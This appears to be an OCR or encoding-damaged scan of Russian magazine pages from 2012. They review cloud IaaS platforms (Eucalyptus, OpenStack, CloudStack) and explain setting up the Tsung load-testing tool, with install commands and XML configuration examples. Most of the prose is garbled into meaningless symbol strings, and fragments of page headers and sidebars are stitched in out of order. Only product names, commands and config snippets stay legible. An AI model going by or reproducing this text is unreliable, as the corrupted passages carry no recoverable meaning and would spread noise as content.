;7# #%&6 :+&+(/# !'.#&/. F !+%&'(.# Cloud Foundry 05##&%* 8#%.+)6.+ &#%&+(/A !"0-)+7#80-, .+&+"/# 5+78+ 1'!;%&0&6 $)* !"+(#".0 "',+&+%!+%+,8+-%&0. H'.7# 5+78+ 0%!+)61+('&6 %!#D0')68/- $0%&"0,;&0( Stackato (activestate.com/stackato).

I%8+(8/5 .+8.;"#8&+5 CloudFoundry *()*#&%* PaaS-!)'&9+"5' OpenShift (https://openshift.redhat.com/app), +&."/&'* ( '!"#)# 2012 :+$' .+5!'80#- Red Hat.

CLOUD FOUNDRY

?#,2.@2=+ OpenNebula Sunstone

!"#$#%&' #()*+*

!"#$% 09 /164/ 2012 127

%*,')'- . /"011, 1#23.3,'4* #,5',#%. 6"#4' 3,*72*",7#/# 31#3#(* 1#)05'7.8 IP 2)8 /#3,'%&9 :; (DHCP, 3,*,.5'3+.-), *24.7.3,"*,#" 4#<', 3#$2*%*,= 1#23',. 3 #1"'2')'77&4. 1"*%.)*4..

>)*,?#"4* 3#3,#., .$ 18,. #37#%7&9 +#41#7'7,#%, #"/*7.$#-%*77&9 % %.2' #,2')=7#- 3)0<(& . .4'@A.9 3%#- %'(-.7,'"?'-3: Cloud Controller, Cluster Controller, Walrus, Storage Controller . Node Controller. B*+<' 1"'2#3,*%)8',38 7*(#" .73,"04'7,#% +#4*727#- 3,"#+. euca2ools, +#,#"&- 4#<', (&,= .31#)=$#%*7 2)8 01"*%)'-7.8 Eucalyptus . 2"0/.4. 3'"%.3*4., 3#%4'3,.4&4. 3 AWS API. C)8 ('$#1*37#- 3%8$. 4'<20 %70,"'77.4. 1"#D'33*4. .31#)=$0',38 1"#,#+#) SOAP . '/# "*3E."'7.' WS-Security.

F*$%'",&%*7.' #()*+* 1". 1#4#A. Eucalyptus 7' %3'/2* 1"#.39#-2., /)*2+# . ,"'(0', #("*A'7.8 + 2#+04'7,*D.. 1# 47#/.4 %#1"#3*4. G 1'"%0@ #5'"'2= 3)'20', #("*,.,= %7.4*7.' 7* 2%* "0+#%#23,%*: Administrator’s . User’s Guide. F*$"*(#,5.+. 1"'2)*/*@, "'1#$.,#-".. . 1*+',& 2)8 (#)=E.73,%* 1#10)8"7&9 2.3,".(0,.%#% Linux — Ubuntu, Debian, SLES/openSUSE, RHEL/CentOS . Fedora.

!"#$%&'#()*#'+,* 9/10-.'&/0'1&,2)*#'+,* 8/10-.'+,',( &+3')*/'0(#&4 7/1052/'3(+#'+,* 9/106(+7,(8&."29'+,* 9/10

OPENSTACK:(/.(8',;&$: OpenStack Foundation<(=, 3.'2$,(: openstack.org>&%2#/&4: Apache License

>"#'+, %#$7.+ % .@)' 2010 /#2* % "'$0)=,*,' 3).87.8 2%09 1"#-'+,#%, "*$"*(*,&%*'4&9 Rackspace Hosting (Rackspace Cloud Files) . NASA (Nebula). :37#%7*8 $*2*5* — 1"'2#3,*%.,= %3'4 <')*@A.4 %#$4#<7#3,= 3#$2*,= 3%#' 3#(3,%'77#' #()*+# ('$ +*+.9-).(# #/"*7.5'7.-. >"#'+, "*$%.%*',38 %'3=4* *+,.%7#, 7#%&' %'"3.. %&9#28, 1# 4'"' /#,#%7#3,. ('$ +*+#/#-).(# 3,*(.)=7#/# D.+)* %&103+* "').$#%. 6*<2&- "').$ 1#)05*', 3%#' .48, 7*5.7*@A''38 3# 3)'20@A'- (0+%& *)?*%.,* (Austin, Bexar, Cactus…). ;'/#278 + "*$"*(#,+' OpenStack 1".3#'2.7.)#3= (#)'' 150 +#41*7.-, 3"'-2. +#,#"&9 ,*+.' /./*7,&, +*+ Cisco, HP, Dell, AMD, Intel . NEC. C# 7'2*%7'/# %"'4'7. % H,#4 31.3+' (&)* . Citrix, 7# #7* 1'"'3,*)* 1#22'"<.%*,= OpenStack % .7,'"'3*9 3%#'/# CloudStack. G %'"3.. 11.10 (Oneiric Ocelot) 2)8 1#3,"#'7.8 #()*57#- 1)*,?#"4& Ubuntu (#)'' 1"#3,#- % 7*3,"#-+*9 . 7'#/"*7.5'77&- % %#$4#<7#3,89 OpenStack $*4'7.) .31#)=$#%*%E.-38 2# H,#/# Eucalyptus.

OpenStack .$7*5*)=7# .4'', 4#20)=70@ 3,"0+,0"0, %+)@-5*@A0@ ,". #37#%7&9 +#41#7'7,* (+*<2&- 4#<', 3#3,#8,= .$ 7'3+#)=+.9 3'"%.3#%):• Nova — +#7,"#))'" %&5.3).,')=7&9 "'30"3#% (#37#%* IaaS);• Swift — 4*3E,*(."0'4*8 3.3,'4* 9"*7'7.8 2*77&9;• Glance — 3'"%.3 1#.3+* . 9"*7'7.8 #("*$#% %.",0*)=7&9 4*E.7,

3 1#22'"<+#- #(7#%)'7.8 #(I'+,#%, "'1).+*D.'-, #('31'5'7.'4 D')#3,7#3,. . %#$4#<7#3,=@ 1"'2#3,*%)'7.8 3,*,.3,.+..

G1#3)'23,%.. + 7.4 2#(*%.)38 3'"%.3 .2'7,.?.+*D.., *0,'7,.?.+*D.. . 1#).,.+ (Keystone), * ,*+<' 4#20)=7#' Django-%'(-1".)#<'7.', 1"'2#3,*%)8@A'' +#7'57#40 1#)=$#%*,')@ .7,'"?'-3 *24.7.3,"*,#"* 2)8 01"*%)'7.8 3'"%.3*4. — OpenStack Dashboard (Horizon). ; %'"3.. Essex % OpenStack .31#)=$0',38 3','%*8 1#23.3,'4* Quantum, 1#$%#)8@A*8 3#$2*%*,= 3','%&' ,#1#)#/.. )@(#- 3)#<7#3,. 3 1#22'"<+#- 1#).,.+. >#22'"<+* % Quantum 1)*/.7#% . #,+"&,&- API 2*@, %#$4#<7#3,= % (020A'4 2#(*%.,= )@(&' ?07+D.. (7*1".4'", firewall, IDS/IPS, (*)*73."#%+0

7*/"0$+., VPN). G 7*3,#8A'' %"'48 2#3,017# 7'3+#)=+# 1)*/.7#%, #('31'5.%*@A.9 1#2+)@5'7.': Open vSwitch, Cisco UCS/Nexus, Linux Bridge, Nicira Network Virtualization Platform . Ryu OpenFlow Controller Plugin.

G +*5'3,%' ,'97#)#/.- %.",0*).$*D.. 4#/0, %&3,01*,= KVM, UML, XenServer/XCP, VMware, LXC . QEMU. >#22'"<.%*',38 Live Migration, +%#,& 7* "'30"3&, E*()#7&, "#)'%*8 4#2')= 2#3,01* RBAC, 1#2+)@5*'4&' 2.3+. . 47#/#' 2"0/#'. ># 04#)5*7.@ % Nova 2#3,017# 18,= 1"'27*3,"#'+ VM (flavor type), % +#,#"&9 #1.3&%*',-38 +#).5'3,%# CPU, "*$4'" :JK . <'3,+#/# 2.3+*, 1". 7'#(9#2.4#-3,. 4#<7# 3#$2*%*,= 3%#. ?)*%#"&. L#)'' %&3#+#- #"/*7.$*D.#7-7#- 3,"0+,0"#- 8%)8@,38 1"#'+,&, %+)@5*@A.' % 3'(8 #,2')=7&' 1#23',., 9"*7.).A*, #("*$&, +)@5. . 05',7&' $*1.3..

C#3,017& "'1#$.,#".. 2)8 Ubuntu, Debian, RHEL/CentOS . Fedora, openSUSE/SLES. G #3,*)=7&9 :; "*$%'",&%*7.' 4#<7# 1"#.$%'3,. 1". 1#4#A. .39#27&9 ,'+3,#%. C)8 (&3,"#/# 3#$2*-7.8 OpenStack-#()*+#% 7* %.",0*)=7&9 4*E.7*9 .). ?.$.5'3+#4 #(#"02#%*7.. 4#<7# .31#)=$#%*,= 3+".1, DevStack (devstack.org). M,#(& 03,*7#%.,= OpenStack % Ubuntu 11.10/12.04 .). Fedora 16, 2#-3,*,#57# 3+*5*,= . %&1#)7.,= 3+".1, stack.sh (1# 33&)+' devstack.org/stack.sh.html 4#<7# 7*-,. 9#"#E'' #1.3*7.' '/# "*(#,&).

$ git clone git://github.com/openstack-dev/devstack.git$ cd devstack; ./stack.sh

F*$%'"70,= OpenStack 7* 7'3+#)=+.9 3'"%'"*9 4#<7# 1". 1#4#A. Puppet (.73,"0+D.. 4#<7# 7*-,. 1# *2"'30 goo.gl/LkRfr), Crowbar .). Chef. F*$"*(#,5.+. 2.3,".(0,.%* StackOps (stackops.org) 1"'2-)*/*@, /#,#%0@ 3(#"+0 7* (*$' Ubuntu, 1#$%#)8@A0@ (&3,"# "*$-%'"70,= 70<7#' +#).5'3,%# 3'"%'"#% OpenStack. >"*%2*, ,'+0A*8 3,*(.)=7*8 %'"3.8 0.3 .31#)=$0', Diablo, 1#H,#40 )05E' %$8,= 1#+* ,'3,#%0@ 0.5 3 (#)'' 3%'<'- %'"3.'- OpenStack. >"#'+, ,*+<' 1"'2)*/*', /#,#%&' #("*$& VM 2)8 $*103+* 7* KVM.

B*+<' 1"#,'3,."#%*,= 3%#. 1".)#<'7.8 % OpenStack 4#<7#, #("*,.%E.3= % ('31)*,7&- 3'"%.3 TryStack (trystack.org), 1#2-2'"<.%*'4&- Cisco, Dell, Equinix, HP, NTT . Rackspace. G F#33.. 1#22'"<+#- OpenStack $*7.4*',38 Russian OpenStack Community, 7* 3,"*7.5+*9 3*-,* openstack.ru 2#3,017* .7?#"4*D.8 1# 1"#20+,0, 9#"#E# 2#1#)78@A*8 #?.D.*)=7&' 2#+. (docs.openstack.org . wiki.openstack.org).

6"#4' Horizon, 2)8 01"*%)'7.8 OpenStack .31#)=$0@,38 +#-4*727&' 0,.).,& (nova, nova-manage . 1"#5.'), +#,#"&' 1#22'"-<.%*@, %3' 2#3,017&' ?07+D.. . 3,*72*",7&' +).'7,&, 3#%4'3,.-4&' 3 Amazon EC2 (euca-tools).

!"#$%&'#()*#'+,* 9/10-.'&/0'1&,2)*#'+,* 8/10-.'+,',( &+3')*/'0(#&4 8/1052/'3(+#'+,* 8/106(+7,(8&."29'+,* 9/10

?3.(0)2#&2 +2.0&+(9& 0 '$#2 OpenStack Horizon

SYN/ACK

!"#$% 09 /164/ 2012128

!"), CLI "#" CloudStack API. $ %&'&#()(") * +,&)!- +&.+/,)((&!- API CloudStack '&%%)01",2)/ Amazon EC2 API (3)0)4 &/%)#5(67 !&%-#5 CloudBridge), S3 API " vCloud API. 8(&9") ,&'0&+6 2,/&!2-/"4"0&,2(6, " .&#5:"(+/,& &')02;"7 ,6'&#(<=/+< .-*,2#5(& &%-("! >)#3*&! !6:*". ?%!"("+/02/&0 !&1)/ &3)(5 #)9*& ,6%)#"/5 *,&/6, +&4%2/5 (&,-= VM "4 :2.#&(2, ')0)02+'0)%)#"/5 0)+-0+6, , /&! 3"+#) '&%*#=3", '-.#"3(&) &.#2*&. @&#54&,2/)#5 /2*1) -'02,#<)/ +,&"!" VM , '0)%)#2A ,6%)#)((6A )!- 0)+-0+&,.

B)4-#5/2/&! +&/0-%("3)+/,2 + OpenStack +/2#2 '&%%)01*2 Swift , CloudStack 3.0, ,6:)%:)! , (232#) 2012 9&%2. C2*1) , D/&7 ,)0+"" 0)2#"4&,2(2 "(E02+/0-*/-02 NaaS (Networking as a Service), 2 CloudStack '&#(&+/5= "(/)90"0-)/+< + Citrix NetScaler SDX/VPX, &.)+')3",2< '&,6:)((-= .)4&'2+(&+/5 " '0&"4,&%"/)#5(&+/5 +)/".

F#< -+/2(&,*" '0)%#292=/+< "+A&%(6) /)*+/6 " ."(20(6) +.&0*" %#< Ubuntu 10.04 " RHEL/CentOS 6.2. C2*1) (2 rPath !&1(& (27/" 9&/&,-= +.&0*- + CloudStack (rpath.com/solutions/cloudstack.php). F&*-!)(/2;"< ,)+5!2 '&%0&.(2< " A&0&:& +/0-*/-0"0&,2(2, 2 '&/&!- '&!&92)/ .)4 '0&.#)! '0&7/" ,+) D/2'6 024,)0/6,2("< IaaS (2 .24) CloudStack.

!"#$%&'#()*#'+,* 10/10-.'&/0'1&,2)*#'+,* 9/10-.'+,',( &+3')*/'0(#&4 10/1052/'3(+#'+,* 9/106(+7,(8&."29'+,* 9/10

$G$HF @0"</(& &+&4(2,2/5, 3/& +)9&%(< %&+/-'(6 *23)+/,)((6) " .)+-'#2/(6) '0&%-*/6, *&/&06) &.#2%2=/ ,+)!" ()&.A&%"!6!" %#< +&4%2("< +,&)9& +&.+/,)((&9& &.#2*2 E-(*;"<!". z

CLOUDSTACK:(/.(8',;&$: Citrix Systems / Apache Foundation<(=, 3.'2$,(: cloudstack.org, sf.net/projects/cloudstack>&%2#/&4: Apache License

I"+/)!2 %#< &092("42;"" IaaS, *&/&02< '&%&7%)/ *2* %#< ()-.&#5:&7 90-''6 ,"0/-2#5(6A &*0-1)("7 (2 ()+*&#5*"A !2:"-(2A, /2* " %#< '&+/0&)("< cloud-+"+/)! -0&,(< %2/2-;)(/02 "#" '0)%'0"</"<. $ *23)+/,) +"+/)! ,"0/-2#"42;"" "+'&#54-=/+< Oracle VM (VirtualBox), KVM, OVM, VMware vSphere " XenServer, *&/&06) !&1(& "+'&#54&,2/5 '202##)#5(&. J#")(/ +2!&+/&<-/)#5(& ,6."02)/, *2*&7 9"')0,"4&0 )!- .&#5:) '&%A&%"/ %#< *&(*0)/(&9& +)0,)02.

K232#& 02402.&/&* %2/"0&,2(& 2010 9&%&!, - "+/&*&, +/&<#2 *&!'2("< VMOps ('&% 0-*&,&%+/,&! LD(2 M"2(2 (Sheng Liang), +&4-%2/)#< ,"0/-2#5(&7 !2:"(6 JVM), 42/)! '0&)*/ .6# ')0)"!)(&,2( , Cloud.com. @02*/"3)+*" ,)+5 *&% 02+'0&+/02(<#+< '&% #";)(4"-)7 GNU GPL, 42*06/&7 &+/2,2#2+5 #":5 ().&#5:2< )9& 32+/5, &/-,)32,:2< 42 '&%%)01*- *&!!)03)+*"A +"+/)! Cisco " EMC. $ "=#) 2011-9& Cloud.com '0"&.0)#2 Citrix, " *&%, ,&'0)*" ,+)! &'2+)("<!, .6# &'-.#"*&,2( '&% GNU GPLv3. $ (2+/&<>)) ,0)!< 02402.&/*" ')0)%2=/+< , Apache Foundation, 2 #";)(4"< "4!)()(2 (2 Apache License. @202##)#5(& Citrix ')0)+/2#2 '&%%)01",2/5 OpenStack , '&#54- .&#)) 40)#&9& CloudStack.

N+'&#54-< CloudStack, !&1(& '&+/0&"/5 (2 +,&)! &.&0-%&,2-("" +/0-*/-0-, 2(2#&9"3(-= Amazon EC2, + 9".*"!" ,&4!&1(&-+/<!" -'02,#)("< ,+)!" %&+/-'(6!" 0)+-0+2!" (,"0/-2#5(6!" +)0,)02!", +)/<!" " +"+/)!2!" A02()("< %2((6A) '-.#"3(&9& " '0",2/(&9& &.#2*2 "4 )%"(&7 *&(+&#". $ '0&+/)7:)! +#-32) "(E02+/0-*/-02 +&+/&"/ "4 &%(&9& -'02,#<=>)9& +)0,)02 " (2-.&02 ,63"+#"/)#5(6A -4#&,, (2 *&/&06A &092("4-)/+< ,6'&#()-(") 9&+/),6A HI , 0)1"!) ,"0/-2#"42;"". H%"( +)0,)0 !&1)/ -'02,#</5 %)+</*2!" /6+<3 /)00"/&0"2#5(& -%2#)((6A +)0,)0&,. O&/< , +#&1(6A +"+/)!2A ,&4!&1(& "+'&#54&,2(") *#2+/)02 "4 ()+*&#5*"A -'02,#<=>"A +)0,)0&, " .2#2(+"0&,>"*&, (290-4*", 2 +2!2 "(E02+/0-*/-02 !&1)/ .6/5 024."/2 (2 +)9!)(/6 (, /2* (246,2)!6) zones), E-(*;"&("0-=>") , &/%)#5(&! %2/2-;)(/0). @&%%)01",2)/+< '&#(2< "4&#<;"< 0)+-0+&,, "A 2,/&!2/"3)+*&) ,6%)#)(") " &902("3)("), "4 %0-9"A ,&4!&1(&+/)7 +/&"/ &/!)/"/5: !&("/&0"(9 , 0)2#5(&! ,0)!)(", '&%+"+/)!- &/3)/&,, +0)%+/,2 %#< +&4%2("< +(2':&/&, " 0)4)0,(&9& *&'"0&,2("<, 2,/&!2/"3)-+*&) ,&++/2(&,#)(") ,"0/-2#5(6A !2:"( '&+#) +.&< +)0,)02.

P'02,#)(") ,&4!&1(& 3)0)4 '&(</(67 %21) (&,"3*- ,).-"(/)0E)7+ (Citrix ,+)9%2 +#2,"#2+5 +,&"!" -%&.(6!" "(/)0E)7+2-

?#,2.@2=+ "3.(0)2#&4 CloudStack 3.'+,, 3'#4,2# & @"#$%&'#()2#6(+,2. .(/02.,A0(#&4 OpenStack 0 1&+,.&8",&02 StackOps

!"#$%&'() CLOUDSTACK, *$+,$ #$"-.$!-& ,/ "0$1* $2$.(3$0/,!! "-.(4-(.(, /,/%$5!6,(7 AMAZON EC2

Ñæëìáíá

SYN/ACK

!"#$% 09 /164/ 2012130

TSUNG: !"#$!%&%'%((") #*#+%," ("-!./01(0-0 +%#+*!02"(*) 2%3-$!*'04%(*5

!"#$%&' ()*+((-)+(),-

timmy mathematicus (shmublon@gmail.com)

!"#$%&' ()*+((-)+(),-

!"#$% 09 /164/ 2012 131

./0123405678 TSUNG /'#*'9,):' Tsung 9;<' $'=')' - 2000 >,?" @%:,<A @%:<,(,B (Nicolas Niclausse). 5C+*-' D), 9;<' *'(C*+?+<+$$'A (%()+B' ?<A $'>*"#,=-$,>, )+()%*,-'$%A Jabber’', C*+?$'#$'=+$$'A ?<A -$")*+$$%E $"F? :,BC'$%% IDEALX ($;$+ OpenTrust). G+*+# $+(:,<H:, B+(A&+- C*,+:) *'#-%<(A - ,C+$(,*($;I B"<H)%C*,),:,<H$;I %$()*"B+$) $'>*"#,=-$,>, )+()%*,-'$%A. 5+>,?$A Tsung ( C,<$;B C*'-,B B,F$, C*%=%(-<%)H : ,?$%B %# <"=J%E *+J+$%I - (-,+I ,9<'()%. 3)%<%)' C,?E,?%) ?<A )+()%*,-'$%A B$,>%E -%?,- :<%+$)-(+*-+*$;E C*%<,F+$%I $' 9'#+ HTTP, SOAP, WebDAV, Jabber/XMPP, LDAP, MySQL % PostgreSQL. K<'>,?'*A B,?+<% <+>:,-+($;E C*,&+((,-, #'<,F+$$,I - A#;:+ Erlang, $' :,),*,B $'C%('$ Tsung, -,#B,F$, (,#?'$%+ 9,<++ 50 000 :,$:"*+$)$;E #'C*,(,- - (+:"$?" ( ,?$,>, :,BCHL)+*'. M<A 9,<HJ+I *+'<%()%=$,()% :'F?;I %# -%*)"'<H$;E C,<H#,-')+<+I B,F+) «E,?%)H» C, ('I)" C, %$?%-%?"'<H$,B" (&+$'*%L % %B+)H <%=$;+ C'*'B+)*;. @'>*"#,=$;I (&+$'*%I B,F+) 9;)H *'#9%) $' N'#;, $'-C*%B+* ?<A C<'-$,>, C,-;J+$%A $'>*"#:% <%9, %B%)'&%% :*'):,-*+-B+$$;E C%:,- $'>*"#:%. .*% C*,-+?+$%% )+()' B,F$, #'?+I()-,-')H ?,C,<$%)+<H$;+ B,$%),*; ('>+$) B,$%),*%$>' Erlang, SNMP, Munin), C,#-,<ALO%+ :,$)*,<%*,-')H C'*'B+)*; (%()+B;, $' :,),*,I *'9,-)'+) -+9-(+*-+*. P*>'$%#,-'$, F"*$'<%*,-'$%+ *+#"<H)'),- )+()' % *'#$,,9*'#$'A -%#"'<%#'&%A *+#"<H)'),- (>*'N%:%, ?%'>*'BB;, )'9<%&; % C*,=++).

3568@P7!8 .+*-;B ?+<,B "()'$'-<%-'+B C':+) erlang % #'-%(%B,()%:

$ sudo apt-get install erlang$ sudo apt-get install gnuplot-nox libtemplate-perl \ libhtml-template-perl libhtml-template-expr-perl

Q')+B (:'=%-'+B C,(<+?$LL -+*(%L ")%<%);, -;C,<$A+B (9,*-:" % (,#?'+B :,$N%>"*'&%,$$;I N'I< tsung.xml - C,??%*+:),*%% .tsung ?,B'J$+>, :')'<,>':

$ wget http://tsung.erlang-projects.org/dist/tsung-1.4.2.tar.gz$ tar -zxvf tsung-1.4.2.tar.gz$ ./confi gure && make$ sudo make install$ mkdir ~/.tsung; touch ~/.tsung/tsung.xml

@856/PR!8 7(A :,$N%>"*'&%A Tsung E*'$%)(A - ,?$,B XML-N'I<+, :,),*;I %B++) (<+?"LO"L ()*":)"*":

<?xml version="1.0"?> <tsung loglevel="info" dumptraffi c="false"> ... </tsung>

5 C'*'B+)*,B loglevel, ?"B'L, B$,>%+ -()*+='<%(H, )*'?%&%,$$, ,$ ,C*+?+<A+) "*,-+$H F"*$'<%*,-'$%A. .'*'B+)* dumptraffic %(-C,<H#"+)(A ?<A ,)<'?:% (&+$'*%A: +(<% ,$ -:<L=+$ (dumptraffic=true), ), (,#?'+)(A ?,C,<$%)+<H$;I <,>, - :,),*;I #'C%(;-'L)(A C,<$;+

@' (+>,?$AJ$%I ?+$H ("O+()-"+) B$,F+()-, %$()*"B+$),- ?<A C*,-+?+$%A $'>*"#,=$,>, )+()%*,-'$%A, $, $% ,?%$ %# $%E $+ -C+=')<%< B+$A )':, :': Tsung. S), B,O$,+ % >%9:,+ *+J+-$%+, :,),*,+ C,#-,<A+) %B%)%*,-')H 9,<HJ"L $'>*"#:", %(C,<H#"A B%$%B"B *+("*(,-.

!"#$", %&$'$()(*+,''-. Tsung

/*0)#$%"+* 1*2304#$''-5 1*067*+,"$0$. ) 3*0)#$%"+* *"+$"*+ %$(+$(, + %$38'28

HTTP:1. !"#$%&' GET, POST, PUT, DELETE, HEAD.2. ()*%+"*,-.&/%. 0#$")1.2,. cookies.3. 3%44.$5/" GET If-Modified-Since.4. 6.5,+ #$%/&, 417 8"#,&, &.&&,9 & #%+%:;< =$"08.$".5. 3%44.$5/" SOAP & #%+%:;< HTTP-8"#$%&%) (8">%1%)/,

SOAPAction %=$"="*')"<*&7).

Jabber/XMPP:1. ?%%=:.2,7 %= "0*.2*,@,/"A,,, $.>,&*$"A,, , #$,&0*&*),,.2. B"* &%%=:.2,7 417 %21"92- , %@1"92-#%1;8%)"*.1.9.3. Roster- , GET-8"#$%&'.4. C2%>%#%1;8%)"*.1;&/,9 -"*: #%4/1<-.2,. / room’0, &%%=:.2,7

) room’., &+.2" 2,/".5. !"#$%&' &,2D$%2,8"A,, #%1;8%)"*.1.9.

9!::;<=/> 9<!?!/!@!A

SYN/ACK

!"#$% 09 /164/ 2012132

! "#$$%& '()&*(* +,%(#- &#.)$# )/'%0123*,/- + 40#/,*(* Tsung / 5%01.)& «+*/%&» ) "+3&- -"(#&). 6% 3&%07#$)8 $#9(324# (#+$%&*($% (#/'(*"*0*$# $# +/* -"(# (%"$% -"(% $# 40)*$, '% 3&%07#$)8). 6#(#&*,( weight (integer) &%:*, 5;,1 )/'%012%+#$ "0- $#/,(%<4) '()%(),*,$%/,) &#.)$; 40)*$,#. ! 7#/,$%/,), */0) 3 %"$%9% 40)*$,# +*/ 1, # 3 "(39%9% 2, +,%(%< 2#'3/,), + "+# (#2# 5%01.* 82*(%+, 7*& '*(+;< ('(%'%(=)) 53"3, 1/3 ) 2/3). ! '()-+*"*$$%& /=*$#()), 9"* 3 +,%(%9% 40)*$,# CPU = 2 ) weight = 3, +*/ (#+*$ 1,5 "0- 4#:"%9% -"(#.

6#(#&*,( maxusers )/'%0123*,/- "0- ,%9%, 7,%5; %5%<,) 0)&), $# &#4/)&#01$%* 7)/0% socket’%+, %,4(;+#*&;> %"$)& '(%=*//%& (+% &$%9)> ?@ '% 3&%07#$)8 1024). 6() '(*+;.*-$)) 0)&),# 2#'3/4#*,/- $%+#- +)(,3#01$#- &#.)$# Erlang’#. A$#7*$)* maxusers %5;7$% (#+$% 800, $% /*<7#/ &%:$% ) $3:$%

%,+*,; %, /*(+*(#, '%/0* %,0#"4) *9% /0*"3*, %,4087),1. B#4:* dumptraffic &%:*, '()$)&#,1 "%'%0$),*01$;* 2$#7*$)- "0- /%4(#-C*$$%9% 0%9)(%+#$)- ,(#D)4#: light — 2#')/;+#*, ,%014% '*(+;* 44 E5 %,+*,# ) protocol — 2#')/;+#*, ,%014% '#(#&*,(; 2#'(%/# ) URL.

F*&#0%+#:$%< %/%5*$$%/,18 Tsung -+0-*,/- +%2&%:$%/,1 4%$-D)93(#=)) 40#/,*(# )2 40)*$,/4)> &#.)$. G%:$% )/'%012%+#,1 $*/4%014% +)(,3#01$;> IP / %"$%< &#.)$;, H,% 4(#<$* '%0*2$% + /037#*, */0) load-balancer $# /*(+*(* )/'%0123*, IP 40)*$,# "0- (#/'(*"*0*$)- ,(#D)4# &*:"3 40#/,*(%& /*(+*(%+.

I#:* */0) Erlang VM ,*'*(1 /'%/%5$# /'(#+0-,1/- / $*/4%014)&) CPU (Erlang SMP), ,*/,; '%4#2;+#8,, 7,% "0- 40)*$,%+ Tsung 5%0** HDD*4,)+$% )/'%012%+#,1 %"$3 VM $# CPU (/ %,4087*$$;& SMP). ?"-$#4% 2$#7*$)* '#(#&*,(# CPU "%0:$% 5;,1 (#+$;& 4%0)7*/,+3 -"*( ,+%)> $%". J/0) ,; '(*"'%7),#*.1 )/'%012%+#,1 Erlang SMP, "%5#+1 %'=)8 ‘-s’ '() /,#(,* Tsung () $* 2#"#+#< CPU + D#<0* 4%$D)93(#=))).

<clients> <client host="test1" weight="1" maxusers="8000"> <ip value="10.0.2.3"/> <ip value="10.0.2.4"/> </client> <client host="test2" weight="3" maxusers="25000" cpu="2"> <ip value="10.1.2.5"/> </client></clients><servers> <server host="10.2.2.10" port="8081" type="tcp"/></servers>

!"#$# "%#&% #%'(%&%) *+#,+-''. LoadRunner, Performance Tester & QALoad. /01" &2 3 %#', 4%# %. '#5(6) *#*+#"&%) 7#'*-8&1-+-9+-$#%4&7- &9'(8&%) &0& "7#8:&,;+&+#3-%) "&"%('; *#< %3#& 8;5<., =%& "&"%('. #$.48# ;8&3(+"-0)8. & *#<2#<>% <0> %("%&+#3-8&> 01$#,# *+#,+-''8#,# #$("*(4(8&>. ?# 8( 7-5<-> #+,-8&9-@&> ,#%#3- *0-%&%) $#0)6&( <(8),&, 7 %#'; 5( 7 &"2#<8&7-' 8(% <#"%;*-, 4%# <0> '8#,&2 >30>(%"> "<(+5&3-1A&' :-7%#+#'.

!"#$%&' (%)$*+,'%$& -". %#/*+012%1/1 $')$(*13#%(.

)4567 879:;<=>8=9= ?@587:AB

1C8=D58A5 ?9585:A:=E788F4 G=HI<=E7C5H5J K G=LKHM>588F6

INFO

• Erlang — N;8K-@A=87HI8FJ B<FK G:=9:766A:=E7-8AB ? LA876A>5-?K=J CAGA<7@A5J, G:5L87<87>58-8FJ LHB ?=<L78AB :7?G:5L5H588F4 EF>A?HAC5HI8F4 ?A?C56.

• Erlang OFH :7<:7O=C78 -P= #:6?C:=89=6 E 1986 9=L;.

• Tsung BEHB5C?B G=H8=?CIM =C-K:FCF6 A O5?-GH7C8F6 G:=-L;KC=6 (HA@58<AB GPLv2).

• Tsung QNN5K-CAE58 LHB EF?=-K=879:;P588F4 G:=5KC=E.

• (<87>7HI8= Tsung OFH G:5L-87<87>58 LHB 879:;<=>8=9= C5?CA:=E78AB Jabber’7.

!"#$%&'% ()*!) $"&+,-. !" !/0')1.') 2"&, !"3$,(/$ 31"4!) // 3)456"7. 40/ 3"$"(/-$5 #,+') !"0-$",4"8-07

!"#$%&' ()*+((-)+(),-

!"#$% 09 /164/ 2012 133

%(.,/0#,-')0 1,*'#2, 3,/04++ #$'5+$%+ ($'.*%6+*, 30 000, /%6%) 78 .,2$%6'+)(9 :,6'$2,; ulimit -n 30000), <), $+ .*%-+2+) : .,-)+*+ .*,%#-,2%)+/0$,()%.

=()+()-+$$,, 5), .*% $'1*"#,5$,6 )+()%*,-'$%% $">$, (/+2%)0 % #' .'*'6+)*'6% $'1*">'+6,; (%()+6?. Tsung .,22+*->%-'+) $+(:,/0:, )%.,- 6,$%),*%$1' (+*-+*'. @), *,2$,; '1+$) 6,$%),*%$1' Erlang, -(+6 %#-+()$?; Munin % SNMP, '1+$) 2,/>+$ 3?)0 "()'$,-/+$ $' (),*,$+ (+*-+*'. =(/% $'1*"#:' (,#2'+)(9 $' :/'()+* (+*-+*,-, 6,>$, .*%6+$9)0 *'#$?+ '1+$)? 2/9 *'#$?A (+*-+*,-, $'.*%6+*:

<monitoring> <monitor host="10.1.1.94" type="erlang"/> <monitor host="10.1.1.95" type="munin"> <munin port="8081"/> </monitor> <monitor host="10.1.1.96" type="snmp"> <snmp version="v2" community="rwCommunty" port="11161"/> </monitor></monitoring>

B'1*"#:" 6,>$, *'#3%)0 $' $+(:,/0:, C'#, $'.*%6+* ./'-$, ++ .,-?4'9. D $'()*,;:'A #'2'E)(9 2/%)+/0$,()0 :'>2,; C'#? % ,5+*+2$,()0 -?.,/$+$%9 C'#. D :'>2,; C'#+ 6,>$, "()'$,-%)0 :,/%5+()-, :,$:"*+$)$?A .,/0#,-')+/+; 2-"69 (.,(,3'6%: #'-2')0 :,/%5+()-, .,/0#,-')+/+; #' .*,6+>"),: -*+6+$%, $'.*%-6+* 100 .,/0#,-')+/+; - (+:"$2", /%3, ":'#')0, ( :':,; 5'(),),; (,#2'-')0 .,/0#,-')+/+;, $'.*%6+* ,2%$ .,/0#,-')+/0 :'>2?+ 0,01 (+:"$2?. @), 6,>$, %(.,/0#,-')0, $'.*%6+*, 2/9 *'#,1*+-' :+4+; .+*+2 3,/04,; $'1*"#:,;. D ()'3%/0$"E $'1*"#:" 6,>$, -()'-%)0 (.+&%'/0$"E (+((%E - ,.*+2+/+$$,+ -*+69, 2/9 %6%)'-&%% :':,;-/%3, .*,-+*:% %/% #'."(:' (.+&%C%5+(:,1, (+*-%('. B'.*%6+*:

<load> <arrivalphase phase="1" duration="10" unit="minute">

<!-- ǴȔțȔ ȤȔțȢȗȤșȖȔ --> <users interarrival="0.1" unit="second"> </users> </arrivalphase> <arrivalphase phase="2" duration="60" unit="minute">

<!-- ǴȔțȔ ȡȔȗȤȧțȞȜ --> <users arrivalrate="1000" unit="second"> </users> </arrivalphase>

<!-- DZȣșȪȜȔȟȰȡȯș ȥșȥȥȜȜ --> <user session="addManyProducts" start_time="20" unit="minute"/> <user session="checkOrders" start_time="25" unit="minute"/></load>

